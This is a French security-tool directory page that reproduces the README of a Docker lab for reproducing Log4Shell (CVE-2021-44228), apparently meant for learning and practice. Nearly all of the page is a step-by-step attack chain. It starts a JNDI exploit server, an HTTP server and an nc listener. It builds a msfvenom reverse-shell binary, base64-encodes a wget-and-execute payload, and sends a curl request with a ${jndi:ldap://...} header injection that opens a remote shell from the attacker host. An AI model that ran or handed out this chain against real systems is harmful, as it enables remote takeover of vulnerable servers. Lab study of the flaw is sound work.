Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4Shell-CVE-2021-44228-ENV — Environnement Docker Log4Shell | Kitploit
Outils/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Environnement Docker Log4Shell

Voir le dépôt
414il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Environnement de reproduction de Log4Shell

Description de l'exemple

IP de la machine victime : 47.47.47.47

IP de la machine attaquante : 48.48.48.48

Exécution du Docker vulnérable sur la machine victime

  • Utiliser le DockerFile pour construire l'image Docker et l'exécuter :
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

Exécution du Docker d'attaque sur la machine attaquante

  • Utiliser le DockerFile pour construire l'image Docker et l'exécuter
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

Préparation de l'environnement de la machine attaquante

Exécutez les commandes dans trois shells différents, en veillant à ce que les shells restent actifs

  • Sur la machine attaquante, démarrer le serveur JDNI
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • Sur la machine attaquante, démarrer le serveur HTTP
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • Sur la machine attaquante, nc écoute le port
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

Réalisation de l'attaque depuis la machine attaquante

Exécutez les commandes dans le même shell

root@kitploit:~
docker exec -it attack /bin/bash
  • Sur la machine attaquante, préparer le fichier du reverse shell
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • Sur la machine attaquante, préparer le payload
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • Envoyer le payload d'attaque
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

Génération de la commande

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

Démonstration vidéo

Video

Références

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Télécharger l’outil